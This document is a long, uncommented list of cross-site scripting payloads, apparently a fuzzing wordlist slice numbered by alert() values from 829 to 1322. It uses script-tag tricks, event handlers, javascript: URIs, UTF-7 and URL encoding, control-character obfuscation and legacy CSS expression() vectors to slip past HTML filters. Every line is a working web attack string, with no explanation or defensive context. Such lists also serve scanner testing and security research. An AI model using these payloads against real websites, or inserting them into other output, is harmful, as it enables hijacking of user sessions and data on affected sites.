<script>+-+-829-+-+alert(829)</script>
<body/onload=<!-->alert(830)>
<script itworksinallbrowsers>/*<script* */alert(831)</script
<img src ?itworksonchrome?\/onerror = alert(832)
<svg><script onlypossibleinopera:-)> alert(833)
<script x> alert(834) </script 834=2
<div/onmouseover='alert(835)'> style="x:">
<--`<img/src=` onerror=alert(836)> --!>
<div style="xg-p:absolute;top:0;left:0;width:83700%;height:83700%" onmouseover="prompt(837)" onclick="alert(837)">x</button>
<form><button formaction=javascript:alert(838)>CLICKME
‘;alert(839))//’;alert(839))//”;alert(839))//”;alert(839))//–></SCRIPT>”>’><SCRIPT>alert(839))</SCRIPT>
<IMG “””><SCRIPT>alert(840)</SCRIPT>”>
<IMG SRC=javascript:alert(841))>
<IMG SRC=”jav ascript:alert(842);”>
<IMG SRC=”jav	ascript:alert(843);”>
<<SCRIPT>alert(844);//<</SCRIPT>
%253cscript%253ealert(845)%253c/script%253e
“><s”%2b”cript>alert(846)</script>
foo<script>alert(847)</script>
<scr<script>ipt>alert(848)</scr</script>ipt>
<BODY BACKGROUND=”javascript:alert(849)”>
<BODY ONLOAD=alert(850)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(851);”>
<IMG SRC=”javascript:alert(852)”
javascript:alert(853)
<img src="javascript:alert(854);">
<img src=javascript:alert(855)>
<"';alert(856))//\';alert(856))//";alert(856))//\";alert(856))//--></SCRIPT>">'><SCRIPT>alert(856))</SCRIPT>
<IFRAME SRC="javascript:alert(857);"></IFRAME>
<<SCRIPT>alert(858);//<</SCRIPT>
<"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//--></SCRIPT>">'><SCRIPT>alert(859))</SCRIPT>
';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//--></SCRIPT>">'><SCRIPT>alert(860))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert(861)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert(862);</script>&search=1
0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<BODY ONLOAD=alert(864)>
<body onscroll=alert(865)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(866)">lol
<!--<img src="--><img src=x onerror=alert(867)//">
<![><img src="]><img src=x onerror=alert(868)//">
<style><img src="</style><img src=x onerror=alert(869)//">
<? foo="><script>alert(870)</script>">
<! foo="><script>alert(871)</script>">
</ foo="><script>alert(872)</script>">
<? foo="><x foo='?><script>alert(873)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(874)</script>">
<% foo><x foo="%><script>alert(875)</script>">
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(876)</script></svg>
<SCRIPT>alert(877)</SCRIPT>
\\";alert(878);//
</TITLE><SCRIPT>alert(879);</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(880);\">
<BODY BACKGROUND=\"javascript:alert(881)\">
<BODY ONLOAD=alert(882)>
<IMG DYNSRC=\"javascript:alert(883)\">
<IMG LOWSRC=\"javascript:alert(884)\">
<BGSOUND SRC=\"javascript:alert(885);\">
<BR SIZE=\"&{alert(886)}\">
<LINK REL=\"stylesheet\" HREF=\"javascript:alert(887);\">
<STYLE>li {list-style-image: url(\"javascript:alert(888)\");}</STYLE><UL><LI>XSS
žscriptualert(889)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(890);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(891);\"
<IFRAME SRC=\"javascript:alert(892);\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert(893);\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert(894)\">
<TABLE><TD BACKGROUND=\"javascript:alert(895)\">
<DIV STYLE=\"background-image: url(javascript:alert(896))\">
<DIV STYLE=\"background-image: url(javascript:alert(897))\">
<DIV STYLE=\"width: expression(alert(898));\">
<STYLE>@im\port'\ja\vasc\ript:alert(899)';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert(900))\">
<XSS STYLE=\"xss:expression(alert(901))\">
xss:ex/*XSS*//*/*/pression(alert(902))'>
<STYLE TYPE=\"text/javascript\">alert(903);</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert(904)\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(905)\")}</STYLE>
<SCRIPT>alert(906);</SCRIPT>
<BASE HREF=\"javascript:alert(907);//\">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(908)></OBJECT>
d=\"alert(909);\\")\";
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(910);\">]]>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(911)\"></B></I></XML>
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(912)</SCRIPT>\">
echo('IPT>alert(913)</SCRIPT>'); ?>
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(914)</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(915);+ADw-/SCRIPT+AD4-
<IMG SRC=\"javascript:alert(916)\"
<<SCRIPT>alert(917);//<</SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(918)>
<IMG SRC=\" javascript:alert(919);\">
perl -e 'print \"<SCR\0IPT>alert(920)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(921)>\";' > out
<IMG SRC=\"jav
ascript:alert(922);\">
<IMG SRC=\"jav
ascript:alert(923);\">
<IMG SRC=\"jav	ascript:alert(924);\">
<IMG SRC=javascript:alert(925)>
<IMG SRC=javascript:alert(926))>
<IMG \"\"\"><SCRIPT>alert(927)</SCRIPT>\">
<IMG SRC=`javascript:alert(928)`>
<IMG SRC=javascript:alert(929)>
<IMG SRC=JaVaScRiPt:alert(930)>
<IMG SRC=javascript:alert(931)>
<IMG SRC=\"javascript:alert(932);\">
';alert(933))//\';alert(933))//\";alert(933))//\\";alert(933))//--></SCRIPT>\">'><SCRIPT>alert(933))</SCRIPT>
';alert(934))//\';alert(934))//";alert(934))//\";alert(934))//--></SCRIPT>">'><SCRIPT>alert(934))</SCRIPT>
<IMG SRC="javascript:alert(935);">
<IMG SRC=javascript:alert(936)>
<IMG SRC=javascrscriptipt:alert(937)>
<IMG SRC=JaVaScRiPt:alert(938)>
<IMG """><SCRIPT>alert(939)</SCRIPT>">
<IMG SRC="  javascript:alert(940);">
<<SCRIPT>alert(941);//<</SCRIPT>
<SCRIPT>a=/XSS/alert(942)</SCRIPT>
\";alert(943);//
</TITLE><SCRIPT>alert(944);</SCRIPT>
¼script¾alert(945)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(946);">
<IFRAME SRC="javascript:alert(947);"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(948);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(949)">
<TABLE><TD BACKGROUND="javascript:alert(950)">
<DIV STYLE="background-image: url(javascript:alert(951))">
<DIV STYLE="width: expression(alert(952));">
<STYLE>@im\port'\ja\vasc\ript:alert(953)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(954))">
<XSS STYLE="xss:expression(alert(955))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(956))'>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(957)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:alert(958)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(959)">crosssitespt
<frameset onload=alert(960)>
<!--<img src="--><img src=x onerror=alert(961)//">
<style><img src="</style><img src=x onerror=alert(962)//">
<embed src="javascript:alert(963)">
<? foo="><script>alert(964)</script>">
<! foo="><script>alert(965)</script>">
</ foo="><script>alert(966)</script>">
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(967)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(968)')()</script>
<script src="#">{alert(969)}</script>;969
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(970)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(971)</script></svg>
<svg onload="javascript:alert(972)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(973)"></iframe>
+ADw-script+AD4-alert(974)+ADw-/script+AD4-
%2BADw-script+AD4-alert(975)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(976)+ADw-/script+AD4APAAi-
%253cscript%253ealert(977)%253c/script%253e
“><s”%2b”cript>alert(978)</script>
“><ScRiPt>alert(979)</script>
“><<script>alert(980);//<</script>
foo<script>alert(981)</script>
<scr<script>ipt>alert(982)</scr</script>ipt>
‘; alert(983); var foo=’
foo\’; alert(984);//’;
</script><script >alert(985)</script>
<img src=asdf onerror=alert(986)>
<BODY ONLOAD=alert(987)>
<script>alert(988)</script>
"><script>alert(989))</script>
<video src=990 onerror=alert(990)>
<audio src=991 onerror=alert(991)>
';alert(992))//';alert(992))//";alert(992))//";alert(992))//--></SCRIPT>">'><SCRIPT>alert(992))</SCRIPT>
0\"autofocus/onfocus=alert(993)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<IMG SRC="javascript:alert(994);">
<IMG SRC=javascript:alert(995)>
<IMG SRC=JaVaScRiPt:alert(996)>
<IMG SRC=javascript:alert(997)>
<IMG SRC=`javascript:alert(998)`>
<a onmouseover="alert(999)">xxs link</a>
<a onmouseover=alert(1000)>xxs link</a>
<IMG """><SCRIPT>alert(1001)</SCRIPT>">
<IMG SRC=javascript:alert(1002))>
<IMG SRC=# onmouseover="alert(1003)">
<IMG SRC= onmouseover="alert(1004)">
<IMG onmouseover="alert(1005)">
<IMG SRC=/ onerror="alert(1006))"></img>
<IMG SRC="jav ascript:alert(1007);">
<IMG SRC="jav	ascript:alert(1008);">
<IMG SRC="jav
ascript:alert(1009);">
<IMG SRC="jav
ascript:alert(1010);">
<IMG SRC="  javascript:alert(1011);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1012)>
<<SCRIPT>alert(1013);//<</SCRIPT>
<IMG SRC="javascript:alert(1014)"
\";alert(1015);//
</script><script>alert(1016);</script>
</TITLE><SCRIPT>alert(1017);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1018);">
<BODY BACKGROUND="javascript:alert(1019)">
<IMG DYNSRC="javascript:alert(1020)">
<IMG LOWSRC="javascript:alert(1021)">
<STYLE>li {list-style-image: url("javascript:alert(1022)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1023)>
<BGSOUND SRC="javascript:alert(1024);">
<BR SIZE="&{alert(1025)}">
<LINK REL="stylesheet" HREF="javascript:alert(1026);">
<STYLE>@im\port'\ja\vasc\ript:alert(1027)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1028))">
xss:ex/*XSS*//*/*/pression(alert(1029))'>
<STYLE TYPE="text/javascript">alert(1030);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1031)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1032)")}</STYLE>
<XSS STYLE="xss:expression(alert(1033))">
¼script¾alert(1034)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1035);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1036);">
<IFRAME SRC="javascript:alert(1037);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1038)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1039);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1040)">
<TABLE><TD BACKGROUND="javascript:alert(1041)">
<DIV STYLE="background-image: url(javascript:alert(1042))">
<DIV STYLE="background-image: url(javascript:alert(1043))">
<DIV STYLE="width: expression(alert(1044));">
<!--[if gte IE 4]><SCRIPT>alert(1045);</SCRIPT><![endif]-->
<BASE HREF="javascript:alert(1046);//">
<? echo('<SCR)';echo('IPT>alert(1047)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1048)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1049);+ADw-/SCRIPT+AD4-
0\"autofocus/onfocus=alert(1050)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(1051)//
#"><img src=M onerror=alert(1052);>
element[attribute='<img src=x onerror=alert(1053);>
[<blockquote cite="]">[" onmouseover="alert(1054);" ]
<scr<script>ipt>alert(1055)</scr</script>ipt><scr<script>ipt>alert(1055)</scr</script>ipt>
<sCR<script>iPt>alert(1056)</SCr</script>IPt>
%253Cscript%253Ealert(1057)%253C%252Fscript%253E
<IMG SRC=x onload="alert(1058))">
<IMG SRC=x onafterprint="alert(1059))">
<IMG SRC=x onbeforeprint="alert(1060))">
<IMG SRC=x onbeforeunload="alert(1061))">
<IMG SRC=x onerror="alert(1062))">
<IMG SRC=x onhashchange="alert(1063))">
<IMG SRC=x onload="alert(1064))">
<IMG SRC=x onmessage="alert(1065))">
<IMG SRC=x ononline="alert(1066))">
<IMG SRC=x onoffline="alert(1067))">
<IMG SRC=x onpagehide="alert(1068))">
<IMG SRC=x onpageshow="alert(1069))">
<IMG SRC=x onpopstate="alert(1070))">
<IMG SRC=x onresize="alert(1071))">
<IMG SRC=x onstorage="alert(1072))">
<IMG SRC=x onunload="alert(1073))">
<IMG SRC=x onblur="alert(1074))">
<IMG SRC=x onchange="alert(1075))">
<IMG SRC=x oncontextmenu="alert(1076))">
<IMG SRC=x oninput="alert(1077))">
<IMG SRC=x oninvalid="alert(1078))">
<IMG SRC=x onreset="alert(1079))">
<IMG SRC=x onsearch="alert(1080))">
<IMG SRC=x onselect="alert(1081))">
<IMG SRC=x onsubmit="alert(1082))">
<IMG SRC=x onkeydown="alert(1083))">
<IMG SRC=x onkeypress="alert(1084))">
<IMG SRC=x onkeyup="alert(1085))">
<IMG SRC=x onclick="alert(1086))">
<IMG SRC=x ondblclick="alert(1087))">
<IMG SRC=x onmousedown="alert(1088))">
<IMG SRC=x onmousemove="alert(1089))">
<IMG SRC=x onmouseout="alert(1090))">
<IMG SRC=x onmouseover="alert(1091))">
<IMG SRC=x onmouseup="alert(1092))">
<IMG SRC=x onmousewheel="alert(1093))">
<IMG SRC=x onwheel="alert(1094))">
<IMG SRC=x ondrag="alert(1095))">
<IMG SRC=x ondragend="alert(1096))">
<IMG SRC=x ondragenter="alert(1097))">
<IMG SRC=x ondragleave="alert(1098))">
<IMG SRC=x ondragover="alert(1099))">
<IMG SRC=x ondragstart="alert(1100))">
<IMG SRC=x ondrop="alert(1101))">
<IMG SRC=x onscroll="alert(1102))">
<IMG SRC=x oncopy="alert(1103))">
<IMG SRC=x oncut="alert(1104))">
<IMG SRC=x onpaste="alert(1105))">
<IMG SRC=x onabort="alert(1106))">
<IMG SRC=x oncanplay="alert(1107))">
<IMG SRC=x oncanplaythrough="alert(1108))">
<IMG SRC=x oncuechange="alert(1109))">
<IMG SRC=x ondurationchange="alert(1110))">
<IMG SRC=x onemptied="alert(1111))">
<IMG SRC=x onended="alert(1112))">
<IMG SRC=x onerror="alert(1113))">
<IMG SRC=x onloadeddata="alert(1114))">
<IMG SRC=x onloadedmetadata="alert(1115))">
<IMG SRC=x onloadstart="alert(1116))">
<IMG SRC=x onpause="alert(1117))">
<IMG SRC=x onplay="alert(1118))">
<IMG SRC=x onplaying="alert(1119))">
<IMG SRC=x onprogress="alert(1120))">
<IMG SRC=x onratechange="alert(1121))">
<IMG SRC=x onseeked="alert(1122))">
<IMG SRC=x onseeking="alert(1123))">
<IMG SRC=x onstalled="alert(1124))">
<IMG SRC=x onsuspend="alert(1125))">
<IMG SRC=x ontimeupdate="alert(1126))">
<IMG SRC=x onvolumechange="alert(1127))">
<IMG SRC=x onwaiting="alert(1128))">
<IMG SRC=x onshow="alert(1129))">
<IMG SRC=x ontoggle="alert(1130))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1131)";
<IMG SRC=x onload="alert(1132))">
<INPUT TYPE="BUTTON" action="alert(1133)"/>
"><h1><IFRAME SRC="javascript:alert(1134);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(1135)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1136);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1137)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(1138)"></IFRAME>123</h1>
"></iframe><script>alert(1139);</script><iframe frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1140)"></IFRAME>123</h1>
<IFRAME width="420" height="315" frameborder="0" onload="alert(1141)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert(1142);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(1143)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1144);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1145)"></IFRAME>
<img src=``
 onerror=alert(1146)

<script /**/>/**/alert(1147)/**/</script /**/
<iframe/src="data:text/html,<svg ��load=alert(1148)>">
<meta content="
 1149 
; JAVASCRIPT: alert(1149)" http-equiv="refresh"/>
<form><iframe 	ⳬ� src="javascript:alert(1150)"�ⳬ	;>
http://www.google<script .com>alert(1151)</script
<script ^__^>alert(1152))</script ^__^
</style  ><script   :-(>/**/alert(1153)/**/</script   :-(
�</form><input type"date" onfocus="alert(1154)">
<a href="javascript:void(0)" onmouseover=
javascript:alert(1155)
>X</a>
<script ~~~>alert(1156)</script ~~~>
<iframe// src=javaSCRIPT:alert(1157)
<%<!--'%><script>alert(1158);</script -->
<script src="data:text/javascript,alert(1159)"></script>
<iframe/onreadystatechange=alert(1160)
<svg/onload=alert(1161)
<input type="text" value=`` <div/onmouseover='alert(1162)'>X</div>
http://www.<script>alert(1163)</script .com
<svg><script ?>alert(1164)
<img src=`xx:xx`onerror=alert(1165)>
<meta http-equiv="refresh" content="0;javascript:alert(1166)"/>
<script>+-+-1167-+-+alert(1167)</script>
<body/onload=<!-->ⶠalert(1168)>
<script itworksinallbrowsers>/*<script* */alert(1169)</script
<img src ?itworksonchrome?\/onerror = alert(1170)
<svg><script onlypossibleinopera:-)> alert(1171)
<script x> alert(1172) </script 1172=2
<div/onmouseover='alert(1173)'> style="x:">
<--`<img/src=` onerror=alert(1174)> --!>
<div style="position:absolute;top:0;left:0;width:117500%;height:117500%" onmouseover="prompt(1175)" onclick="alert(1175)">x</button>
<form><button formaction=javascript:alert(1176)>CLICKME
<script\x20type="text/javascript">javascript:alert(1177);</script>
<script\x3Etype="text/javascript">javascript:alert(1178);</script>
<script\x0Dtype="text/javascript">javascript:alert(1179);</script>
<script\x09type="text/javascript">javascript:alert(1180);</script>
<script\x0Ctype="text/javascript">javascript:alert(1181);</script>
<script\x2Ftype="text/javascript">javascript:alert(1182);</script>
<script\x0Atype="text/javascript">javascript:alert(1183);</script>
'`"><\x3Cscript>javascript:alert(1184)</script>
'`"><\x00script>javascript:alert(1185)</script>
<img src=1186 href=1186 onerror="javascript:alert(1186)"></img>
<audio src=1187 href=1187 onerror="javascript:alert(1187)"></audio>
<video src=1188 href=1188 onerror="javascript:alert(1188)"></video>
<body src=1189 href=1189 onerror="javascript:alert(1189)"></body>
<image src=1190 href=1190 onerror="javascript:alert(1190)"></image>
<object src=1191 href=1191 onerror="javascript:alert(1191)"></object>
<script src=1192 href=1192 onerror="javascript:alert(1192)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1193)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1194)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1195)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1196)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1197)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1198)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1199)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1200)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1201)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1202)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1203)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1204)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1205)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1206)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1207)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1208)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1209)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1210)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1211)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1212)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1213)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1214)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1215)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1216)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1217)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1218)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1219)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1220)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1221)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1222)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1223)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1224)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1225)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1226)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1227)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1228)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1229)"></body onResize>
<object onError object onError="javascript:javascript:alert(1230)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1231)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1232)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1233)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1234)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1235)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1236)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1237)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1238)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1239)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1240)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1241)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1242)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1243)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1244)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1245)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1246)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1247)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1248)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1249)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1250)"></body onblur>
\x3Cscript>javascript:alert(1251)</script>
'"`><script>/* *\x2Fjavascript:alert(1252)// */</script>
<script>javascript:alert(1253)</script\x0D
<script>javascript:alert(1254)</script\x0A
<script>javascript:alert(1255)</script\x0B
<script charset="\x22>javascript:alert(1256)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1257)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1258)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1259)> -->
--><!-- --\x21260> <img src=xxx:x onerror=javascript:alert(1260)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1261)> -->
`"'><img src='#\x27 onerror=javascript:alert(1262)>
<a href="javascript\x3Ajavascript:alert(1263)" id="fuzzelement1263">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1264)//';</script></p>
<a href="javas\x00cript:javascript:alert(1265)" id="fuzzelement1265">test</a>
<a href="javas\x07cript:javascript:alert(1266)" id="fuzzelement1266">test</a>
<a href="javas\x0Dcript:javascript:alert(1267)" id="fuzzelement1267">test</a>
<a href="javas\x0Acript:javascript:alert(1268)" id="fuzzelement1268">test</a>
<a href="javas\x08cript:javascript:alert(1269)" id="fuzzelement1269">test</a>
<a href="javas\x02cript:javascript:alert(1270)" id="fuzzelement1270">test</a>
<a href="javas\x03cript:javascript:alert(1271)" id="fuzzelement1271">test</a>
<a href="javas\x04cript:javascript:alert(1272)" id="fuzzelement1272">test</a>
<a href="javas\x01273cript:javascript:alert(1273)" id="fuzzelement1273">test</a>
<a href="javas\x05cript:javascript:alert(1274)" id="fuzzelement1274">test</a>
<a href="javas\x0Bcript:javascript:alert(1275)" id="fuzzelement1275">test</a>
<a href="javas\x09cript:javascript:alert(1276)" id="fuzzelement1276">test</a>
<a href="javas\x06cript:javascript:alert(1277)" id="fuzzelement1277">test</a>
<a href="javas\x0Ccript:javascript:alert(1278)" id="fuzzelement1278">test</a>
<script>/* *\x2A/javascript:alert(1279)// */</script>
<script>/* *\x00/javascript:alert(1280)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1281)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1282)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1283)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1284)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1285)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1286);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1287);/*';">DEF
<script>if("x\\xE1288\x96\x89".length==2) { javascript:alert(1288);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1289);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1290);}</script>
'`"><\x3Cscript>javascript:alert(1291)</script>
'`"><\x00script>javascript:alert(1292)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1293)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1294)>
<script src="data:text/plain\x2Cjavascript:alert(1295)"></script>
<script src="data:\xD4\x8F,javascript:alert(1296)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1297)"></script>
<script src="data:\xCB\x8F,javascript:alert(1298)"></script>
<script\x20type="text/javascript">javascript:alert(1299);</script>
<script\x3Etype="text/javascript">javascript:alert(1300);</script>
<script\x0Dtype="text/javascript">javascript:alert(1301);</script>
<script\x09type="text/javascript">javascript:alert(1302);</script>
<script\x0Ctype="text/javascript">javascript:alert(1303);</script>
<script\x2Ftype="text/javascript">javascript:alert(1304);</script>
<script\x0Atype="text/javascript">javascript:alert(1305);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1306)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1307)">DEF
ABC<div style="x:expression\x00(javascript:alert(1308)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1309)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1310)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1311)">DEF
ABC<div style="x:\x09expression(javascript:alert(1312)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1313)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1314)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1315)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1316)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1317)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1318)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1319)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1320)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1321)">DEF
ABC<div style="x:\x20expression(javascript:alert(1322)">DEF
